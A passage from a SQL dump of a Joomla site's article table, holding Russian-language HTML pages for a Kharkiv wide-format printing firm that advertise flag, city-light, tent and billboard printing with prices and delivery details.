40px;\">\r\n							<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span>\r\n							</td>\r\n							<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span>\r\n							</td>\r\n							<td rowspan=\"2\" width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span>\r\n							</td>\r\n							<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./м2)</strong></span></span>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n							<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>до 10м?</strong></span></span>\r\n							</td>\r\n							<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от 10</strong></span></span>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Ткань флажная</span></span>\r\n								</span>\r\n							</td>\r\n							<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.52</span></span>\r\n								</span>\r\n							</td>\r\n							<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">120</span></span>\r\n								</span>\r\n							</td>\r\n							<td width=\"64\"><span style=\"font-size: small;\">152</span></td>\r\n							<td width=\"64\"><span style=\"font-size: small;\">137</span></td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n				<p style=\"text-align: left;\"><span style=\"font-size: small;\"><strong>Наиболее популярные размеры флагов:</strong><br /> 200х146см - <strong>447грн.</strong><br /> 146х100см - <strong>223грн.</strong><br /> 146х50см &nbsp; -&nbsp;<strong>110грн. </strong><br /> 100х100см -&nbsp;<strong>194грн.</strong><br /> 100х50см &nbsp; - <strong>98грн.</strong></span></p>\r\n				<p style=\"text-align: left;\"><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span>\r\n				</p>\r\n				<p style=\"text-align: left;\">Принимаем заказы по звонку или по e-mail.</p>\r\n				<p>&nbsp;</p>\r\n				<hr />\r\n				<p>&nbsp;</p>\r\n				<p style=\"text-align: justify;\"><img style=\"float: left; margin: 10px; border: 1px solid grey;\" src=\"images/stories/flag-1.jpg\" alt=\"\" border=\"0\" />У вас успешная компания? Вы фанат футбольного клуба? Или, может быть, вы решили удивить всех своим флагом – символом вашей фамилии (семьи)?</p>\r\n				<p style=\"text-align: justify;\">В таком случае вам просто необходимо заказать печать флагов.</p>\r\n				<p style=\"text-align: justify;\"><strong>Широкоформатная печать</strong> <strong>флагов</strong> вашей компании повысит и укрепит статус фирмы. Ведь флаг, развивающийся при входе в офис, поможет сделать ваш бренд узнаваемым, придаст солидность фирме и привлечет внимание клиентов.</p>\r\n				<h4 style=\"text-align: justify;\">Нужно уметь выбрать флаг.</h4>\r\n				<p style=\"text-align: justify;\">Но, печать флагов – дело непростое. Чтобы флаг красиво развевался на ветру, чтобы он быстро высыхал после дождя или снега и не был очень тяжелым в мокром состоянии, печать флагов должна выполняться на легкой, и в то же время прочной, ткани.</p>\r\n				<p style=\"text-align: justify;\">&nbsp;</p>\r\n				<p style=\"text-align: justify;\"><img style=\"margin: 5px 10px; border: 1px solid grey; float: right;\" src=\"images/stories/flag-2.jpg\" alt=\"\" width=\"250\" height=\"184\" border=\"0\" /></p>\r\n				<p style=\"text-align: justify;\">Этим условиям соответствует <strong>широкоформатная печать на полиэстеровой ткани</strong>. Флаги, выполненные в такой технике будут шикарно выглядеть в любых погодных условиях. Даже маленький ветерок заставит такой стяг развеваться.</p>\r\n				<p style=\"text-align: justify;\">Широкоформатная печать флагов осуществляется на полиэстровой ткани плотностью <strong>125г/м2.</strong></p>\r\n				<p style=\"text-align: justify;\">Для эксплуатации в неблагоприятных условиях подходит более плотный материал. Осадки, повышенная влажность, морской воздух и соленые брызги не страшны флагу, если для его изготовления использовалась <strong>широкоформатная печать</strong> на полиэстровой ткани повышенной плотности.</p>\r\n				<p style=\"text-align: justify;\">Напоминающий своей структурой шерстяную ткань, такой флаг будет украшать мачту или здание достаточно долго. Для использования в менее экстремальных условиях, подойдет широкоформатная печать флагов на полиэстровой ткани с меньшей плотностью.</p>\r\n				<h4 style=\"text-align: justify;\">Ну и «мастерица», эта широкоформатная печать.</h4>\r\n				<p style=\"text-align: justify;\"><a title=\"широкоформатная печать в Харькове\" href=\"https://ekvatorprint.com.ua/\"><strong>Широкоформатная печать</strong></a>, благодаря современным технологиям, позволяет создавать <strong>флаги</strong> различных размеров с изображением любой сложности достаточно быстро.</p>\r\n				<p style=\"text-align: justify;\">Особенно актуально использование широкоформатной печати, когда необходима печать на полиэстровой ткани замысловатых узоров. Печать флагов – всего один пример, когда широкоформатная печать просто незаменима.</p>\r\n				<p style=\"text-align: justify;\">Для вас, наша фирма \"ЭкваторПринт\" города Харьков изготовит как небольшие <strong>офисные корпоративные флажки</strong>, так и величественные <strong>флаги для улиц</strong>. Печать флагов на полиэстеровой ткани подарит вам легкий, и в то же время прочный символ вашей компании, флаг города Харьков, государства или футбольного клуба. Помимо печати на тонкой полиестеровой мы также осуществляем печать на&nbsp;<a href=\"banner-printing\">печать на баннерной ткани</a>&nbsp;для наружной рекламы, <a href=\"printing-on-vinyl\">печать наклеек</a> в высоком качестве, <a href=\"printing-on-canvas\">печать фотографий на холсте</a> и <a href=\"modulnye-kartiny\">производство модульных картин</a>.</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',1,8,'2011-04-26 17:26:23',62,'','2020-07-21 13:03:07',62,0,'0000-00-00 00:00:00','2011-04-26 17:26:23','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',52,17,'','Широкоформатная печать флагов в Харькове на полиэстеровой ткани. Доставка по всей Украине',1,56278,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(15,49,'Печать сити-лайтов','2011-06-06-17-35-17','<h1 style=\"text-align: center;\">Печать ситилайтов</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p><span style=\"color: #000000; font-size: 10pt;\">Компания&nbsp;Экваторпринт осуществляет <a style=\"color: #000000;\" href=\"https://ekvatorprint.com.ua/\">широкоформатную и интерьерную печать</a>&nbsp;<strong>в Харькове</strong>. </span><br /><span style=\"color: #000000; font-size: 10pt;\">Доставка осуществляется <strong>во все города Украины</strong>&nbsp;.</span></p>\r\n				<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span>\r\n				</p>\r\n				<table style=\"width: 693px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n					<tbody>\r\n						<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n							<td style=\"width: 286.10px;\" height=\"60\"><span style=\"font-size: 14pt;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span>\r\n							</td>\r\n							<td style=\"width: 10px;\"><span style=\"font-size: 10pt;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span>\r\n							</td>\r\n							<td style=\"width: 240px;\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong><span style=\"font-size: 14pt;\">Стоимость</span><br />(грн./м.кв.)</strong>\r\n								</span>\r\n								</span>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"text-align: left; width: 296.5px; height: 40px; background-color: #f5f5f5;\" colspan=\"2\">&nbsp;</td>\r\n							<td style=\"width: 120px; background-color: #f5f5f5;\"><span style=\"text-align: center; background-color: #f5f5f5;\"><span style=\"font-size: 12pt; color: #000000;\">от 5м.кв.</span>&nbsp;</span>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"text-align: left; width: 286.5px;\" height=\"40\">\r\n								<p><span style=\"color: #000000;\"><span style=\"font-size: 14pt;\">Бумага просветная \"Ситик\" &nbsp;</span>&nbsp;</span> &nbsp;&nbsp;</p>\r\n							</td>\r\n							<td style=\"width: 10px;\"><span style=\"font-size: 10pt; font-family: verdana, geneva; color: #000000;\">1.20</span></td>\r\n							<td style=\"width: 120px;\"><span style=\"font-family: verdana, geneva; font-size: 18.6667px; text-align: center; color: #000000;\">71</span>&nbsp;</td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n				<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span>\r\n				</p>\r\n				<p><span style=\"color: #000000; font-size: 14pt;\">Принимаем заказы по e-mail: <span style=\"background-color: #ffff00;\">e@ekvatorprint.com.ua</span></span>\r\n				</p>\r\n				<hr />\r\n				<p>&nbsp;</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td>\r\n				<p style=\"text-align: justify;\"><strong><img style=\"float: left; margin-left: 5px; margin-right: 5px; border: 1px solid grey;\" src=\"images/stories/sitilajt-big.jpg\" alt=\"\" width=\"250\" border=\"0\" /><span style=\"font-size: 10pt;\">&nbsp; <span style=\"color: #000000;\">Сити-лайт</span></span></strong><span style=\"font-size: 10pt; color: #000000;\"> — рекламная современная конструкция чуть выше роста человека, информационная рекламная составляющая размещается на уровне взгляда человека, что способствует более качественному контакту с потребителем. Печать для ситилайтов можно заказать на бумаге СИТИК (белая бумага плотностью 150г./м.кв.) или на <a style=\"color: #000000;\" href=\"printing-on-vinyl\">самоклеющейся пленке</a> (при длительной эксплуатации рекламной конструкции).</span></p>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: 12pt; color: #000000;\"><strong>Преимущества наружной рекламы на сити-лайтах:</strong></span></p>\r\n				<p><span style=\"font-size: 12pt; color: #000000;\">- Хорошее месторасположение сити лайтов —вдоль тротуаров и больших потоков атомобилей</span></p>\r\n				<p><span style=\"font-size: 12pt; color: #000000;\">- Круглосуточная реклама, что обеспечивается внутренней подсветкой в ночное время</span><br /><br /><span style=\"font-size: 12pt; color: #000000;\">- Печать сити лайтов осуществляется на материале не большого формата, что позволяет экономить на печати, сравнительно с другими масштабами широкоформатной печати наружной рекламы</span></p>\r\n				<p><span style=\"font-size: 12pt; color: #000000;\">- Качественный контакт рекламы сити лайта с потенциальным потребителем, можно подойти поближе и ознакомится с информацией более подробно</span></p>\r\n				<p><span style=\"font-size: 12pt; color: #000000;\">- Размещая сити лайты несколько раз по пути потока людей, и повторяя свою рекламу, имидж и образ вашей компании будет более узнаваем.</span></p>\r\n				<p style=\"text-align: center;\"><br /> <strong><span style=\"font-size: 14pt; color: #ff0000;\">Печать сити лайтов в «ЭкваторПринт» гарантирует вам стойкую ярко красочную рекламу!</span><br /></strong></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p><img src=\"images/stories/s-1.jpg\" alt=\"\" width=\"250\" height=\"280\" border=\"0\" /></p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td>\r\n				<p><img src=\"images/stories/s-2.jpg\" alt=\"\" width=\"250\" height=\"280\" border=\"0\" /></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n		<tr>\r\n			<td>\r\n				<p><img src=\"images/stories/s-3.jpg\" alt=\"\" width=\"250\" height=\"280\" border=\"0\" /></p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td>\r\n				<p><img src=\"images/stories/s-4.jpg\" alt=\"\" width=\"250\" height=\"280\" border=\"0\" /></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table style=\"width: 760px; height: 21px; background-color: #6699cc;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p><br /><img style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Помимо печати на бумаге СИТИК также осуществляем:</p>\r\n<p>-&nbsp;<a href=\"banner-printing\">печать рекламных баннеров</a>&nbsp;- недорогая печать на баннерной ткани<br />-&nbsp;<a href=\"printing-on-canvas\">картины для дома и офиса</a> - яркая печать на холсте&nbsp;</p>','',1,8,'2011-06-06 17:32:13',62,'','2022-01-25 12:03:08',62,62,'2022-01-25 12:03:08','2011-06-06 17:32:13','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',84,16,'печать ситилайтов, печать сити лайтов, печать Харьков, печать сити лайтов Харкьов','Широкоформатная печать ситилайтов в Харькове. Доставка по всей Украине',1,31232,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(17,51,'Печать на тенте','2011-06-20-06-02-25','<h1 style=\"text-align: center;\">Печать на тенте</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p><span style=\"background-color: #0000ff;\"><img style=\"float: left; margin-left: 10px; margin-right: 10px; border: 1px solid grey;\" src=\"images/stories/tent-big.jpg\" alt=\"\" width=\"276\" height=\"138\" border=\"0\" /></span></p>\r\n				<p style=\"text-align: justify; font-size: 130%;\"><strong>Брезент</strong>- это тканый материал плотного плетения, обладающий специальными индивидуальными характеристиками. Наиболее часто используемыми материалами для изготовления брезента являются лен, хлопок либо их смесь. Это дает брезенту основное преимущество перед синтетическими материалами, которые не могут полностью заменить его.<br /><br /></p>\r\n				<div style=\"background-color: #fcf8e4;\">\r\n					<div style=\"padding: 10px; margin: 5px;\">\r\n						<p style=\"text-align: center; font-size: 150%;\"><span style=\"color: #0000ff;\">В качестве замены тента можно применять <a style=\"color: #0000ff;\" href=\"banner-printing\"><strong>литую баннерную ткань</strong></a></span>, что будет отличным способом брендирования транспорта и торговых точек, может применяться при изготовлении фирменных; шатров и палаток.<br /> <br /><span style=\"color: #000000;\">Печать больших форматов сделает Вашу рекламу яркой и привлекательной.</span></p>\r\n					</div>\r\n				</div>\r\n				<p style=\"font-size: 130%;\">Также отличным способом брендирования авто может быть <a style=\"color: #000000;\" href=\"printing-on-vinyl\">печать на оракале.</a></p>\r\n				<p style=\"text-align: justify;\">«ЭкваторПринт» осуществляет широкоформатную печать на тенте и брезенте с ПВХ покрытием. Мы гарантируем высокое качество печати и оперативность.<br /><br />Применение чернил, специально предназначеных для наружной рекламы, позволят сделать напечатанное изображение <strong>устойчивым к различным погодным воздействиям и ультрафиолетовым лучам, предохранят его от выгорания</strong>.</p>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Креативная реклама при помощи печати на тенте:</span><br /></span>\r\n				</p>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: medium;\"><img title=\"широкоформатная печать на тенте\" src=\"images/stories/kreativnaja-reklama/avto/pechat-na-tente.jpg\" alt=\"печать на тенте\" width=\"600\" height=\"418\" border=\"0\" /><br /></span></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 760px; height: 21px; background-color: #6699cc;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p><br /><img style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />У нас можно заказать не только печать для рекламы, но и печать для интерьера:</p>\r\n<p>-&nbsp;<a href=\"modulnye-kartiny\">картины модульные</a>&nbsp;- печать любых ихображений: природа, города, пейзажи...<br />-&nbsp;<a href=\"printing-on-canvas\">фотокартины</a>&nbsp;- отличный подарок Вашим друзьям и близким<br /><br /></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>','',1,8,'2011-06-20 05:58:04',62,'','2020-07-21 13:06:28',62,0,'0000-00-00 00:00:00','2011-06-20 05:58:04','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',42,15,'широкоформатная печать, широкоформатная печать харьков','Печать на тенте широкоформатная в Харькове.',1,38679,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(18,52,'Печать билбордов','2012-01-11-12-11-54','<h1 style=\"text-align: center;\">Печать бигбордов (билбордов)</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p>Компания Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины.</strong></p>\r\n				<p><span style=\"color: #0000ff; font-size: 150%;\"><strong>Цена печати:</strong></span></p>\r\n				<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n					<tbody>\r\n						<tr style=\"text-align: center; height: 40px; background-color: #172983;\">\r\n							<td width=\"480\" height=\"40\"><span style=\"font-size: 120%; color: #ffec00;\"><strong>Материал</strong></span></td>\r\n							<td width=\"128\"><span style=\"color: #ffec00; font-size: 120%;\"><strong>Стоимость(грн./шт)</strong></span></td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: 120%;\">Постер (билборд) 3x6 на баннере</span></td>\r\n							<td width=\"128\"><span style=\"font-size: 160%; text-align: center;\">1285</span></td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n				<p><span style=\"color: #0000ff; font-size: 150%;\"><strong>Заказать печать билборда:</strong></span></p>\r\n				<p><span style=\"font-size: 160%;\">Принимаем заказы по e-mail.</span><br /><span style=\"font-size: 130%;\">Для оформления заказа высылайте макет на нашу электронную почту. Макет должен соответствовать Требованиям к макету.</span></p>\r\n				<hr />\r\n				<p>&nbsp;</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td>\r\n				<p><img style=\"float: left; margin: 10px 5px; border: 0pt none;\" title=\"печать билбордов \" src=\"images/stories/pechat-bilbordov.jpg\" alt=\"печать билбордов (бигбордов)\" width=\"300\" border=\"0\" />Без сомнений, с билбордами знакомы практически все. На сегодняшний день, билборд — один из самых востребованных видов наружной рекламы.</p>\r\n				<p>Печать бигбордов займет <strong> до 3х дней</strong>, в зависимости от тиража и нашей загрузки.</p>\r\n				<p><strong>Цена печати</strong> всех материалов указаны на странице <a title=\"цена печати бигборда\" href=\"price\">Прайс лист</a></p>\r\n				<p>В переводе с английского <strong>\"big board\" (бигборд)</strong> — это большая доска, представляющая собой одно- или двусторонний носитель рекламы. Поскольку увидеть рекламные плакаты можно на всех популярных магистралях, то <strong>печать билбордов</strong> очень востребована. Безусловно, такая реклама позволяет проводить рекламные компании, рассчитанные как на долгий, так и на короткий срок.</p>\r\n				<p style=\"font-size: 135%; text-align: center;\">Если печать билбордов заказана для долгосрочной рекламы, то в качестве основы используют баннерную ткань или <strong><a title=\"печать на самоклеющейся пленке\" href=\"printing-on-vinyl\">самоклеящуюся плёнку</a> </strong> Для кроткосрочных рекламных кампаний подойдет <strong>бумага Blue Back Side</strong>.</p>\r\n				<p style=\"font-size: 135%; text-align: center; background-color: #ffe690;\">Хотя стоимость печати билборда на баннерной ткани немного выше, чем на бумаге Блюбэк, срок наружного использования баннерной ткани как минимум в 5 раз дольше, чем бумаги, что в некоторых случаях хорошо сокращает затраты на повторную печать и монтаж.</p>\r\n				<p><br />Как правило, <strong>печать бигбордов</strong> предполагает стандартный размер рекламного плаката, имеющего стороны равные 3 и 6 м. Такой внушительный размер привлекает внимание. А возможность расширить пространство путем выступления частей изображения за стандартные границы дает дизайнерам неограниченные возможности для воплощения оригинальных решений.<br /><br />Стоит отметить удобную планировку большей части городов. Прямые улицы с отменной видимостью повышают эффективность уличной рекламы, а значит, печать бигбордов сохранит свою популярность.</p>\r\n				<p>Креативная реклама с помощью билбордов:</p>\r\n				<p>Реклама молочного коктейля - \"теперь в три раза гуще\":<br /><img src=\"images/stories/kreativnaja-reklama/pechat-bigbordov-koktel.jpg\" alt=\"\" width=\"295\" height=\"341\" border=\"0\" /></p>\r\n				<p>Реклама на бигборде со слоганом: Натуральные цвета краски Berger:<br /><img src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-kraska.jpg\" alt=\"печать бигбордов\" width=\"600\" height=\"441\" border=\"0\" /></p>\r\n				<p>Реклама шоколадного батончика \"теперь охлажденный\":<br /><img style=\"border: 0pt none;\" title=\"печать бигбордов Харьков\" src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-mars.jpg\" alt=\"печать бигбордов\" width=\"600\" height=\"260\" border=\"0\" /></p>\r\n				<p>Призыв компании к размещению рекламы. <br />Надпись на бигборде: Чем скорее вы разместите здесь вашу рекламу - тем лучше.<br /><img style=\"border: 0pt none;\" src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-reklama.jpg\" alt=\"печать билбордов\" width=\"600\" border=\"0\" /></p>\r\n				<p>Социальная реклама - \"Используйте электроэнергию с умом\":<img style=\"border: 0pt none;\" src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-electricit.jpg\" alt=\"печать билбордов (бигбордов)\" width=\"600\" height=\"385\" border=\"0\" /></p>\r\n				<p style=\"text-align: center;\"><a title=\"заказть печать билборда\" href=\"print-billboards\"><span style=\"color: #0000ff;\">Заказать печать билборда</span></a></p>\r\n				<h4><br /><br /><img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Печать билбордов отличается своими достоинствами:</h4>\r\n				<strong>1. <span style=\"font-size: 120%;\"><span style=\"color: #0000ff;\">Увеличение количества</span> потенциальных клиентов.</span></strong><br />Находясь в зоне внимания большого числа людей, бигборды вызывают интерес, что расширяет круг клиентов. Поэтому печать бигбордов обеспечивает немалую часть будущих покупателей.<br /><br /><strong>2. <span style=\"font-size: 120%;\"><span style=\"color: #0000ff;\">Привлечение внимания</span> прохожих, пассажиров и водителей</span></strong>.<br />Печать билбордов пользуется спросом, поскольку они привлекают повышенное внимание как прохожих, так и пассажиров;<br /><br /><strong>3. <span style=\"font-size: 120%;\">Рекламные объявления на бигбордах <span style=\"color: #0000ff;\">читаются очень часто</span>.</span></strong><br />Размещаясь вдоль дороги, особенно вдоль магистралей с насыщенным автомобильным и пешеходным движением, эти рекламные плакаты привлекают к себе внимание, что делает печать билбордов очень рентабельной.<br /><br /><strong>4. <span style=\"font-size: 120%;\">Работа на <span style=\"color: #0000ff;\">конкретную целевую аудиторию</span> в определенном месте.</span></strong><br />Количество откликов на рекламу повышается, если печать билбордов предполагает ее последующее размещение там, где наиболее часто встречается целевая аудитория.<br /><br /><strong>5. <span style=\"font-size: 120%;\"><span style=\"color: #0000ff;\">Небольшая стоимость</span> одного просмотра рекламного плаката.</span></strong><br />Разовая печать бигбордов и дальнейшее их размещение в людных местах обеспечивают стабильный приток ЦА, что повышает окупаемость рекламы.<br /><br /><strong>6. <span style=\"font-size: 120%;\">Наиболее <span style=\"color: #0000ff;\">удачное размещение</span> билбордов рядом с транспортными развязками.</span></strong><br />Печать билбордов будет результативной, если поместить рекламный плакат в людном месте. Кроме многочисленного потока людей, читаемость повышается благодаря транспортным пробкам (люди начинают их читать, чтобы скоротать время).<br /><br /><br /><br />Рекламные плакаты увеличат круг ваших клиентов, заказать печать билбордов и узнать подробности можно по контактным данным на странице <a title=\"контакты - заказть печать билборда\" href=\"contacts\">контакты</a></td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',1,8,'2012-01-11 12:07:47',62,'','2022-01-25 12:01:49',62,62,'2022-01-25 12:01:49','2012-01-11 12:07:47','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',106,14,'печать бигбордов, печать билбордов','Широкоформатная печать билбордов (бигбордов) в Харькове с доставкой по всей Украине.',1,53138,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(19,53,'Доставка','2012-01-23-11-03-31','<table style=\"width: 759px; height: 707px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 12pt;\">Компания \"ЭКВАТОРпринт\" расположена в городе&nbsp;<strong>Харьков.</strong></span></span>\r\n				</p>\r\n				<p style=\"text-align: left;\"><span style=\"font-size: 12pt; color: #ff0000;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <strong><span style=\"font-size: 18pt;\">&nbsp;Мы осуществляем доставку по всей Украине</span></strong>\r\n					</span>\r\n				</p>\r\n				<p style=\"text-align: left;\"><span style=\"font-size: 12pt; color: #ff0000;\"><img style=\"float: left; margin: 10px; border: 0pt none;\" title=\"широкоформатная печать - доставка\" src=\"images/stories/dostavka.jpg\" alt=\"широкоформатная печать - доставка по Украине\" width=\"157\" height=\"auto\" border=\"0\" /></span></p>\r\n				<p>&nbsp;</p>\r\n				<p><span style=\"font-size: 18pt;\">&nbsp; &nbsp; &nbsp; <span style=\"color: #000000;\">&nbsp; &nbsp;<span style=\"font-size: 24pt;\">Доставка по Украине</span></span><br /><span style=\"font-size: 14pt; color: #000000;\">&nbsp; <span style=\"font-size: 18pt;\">осуществляется курьерской службой</span></span>&nbsp;</span>\r\n				</p>\r\n				<p><span style=\"font-size: 14pt;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><strong style=\"line-height: 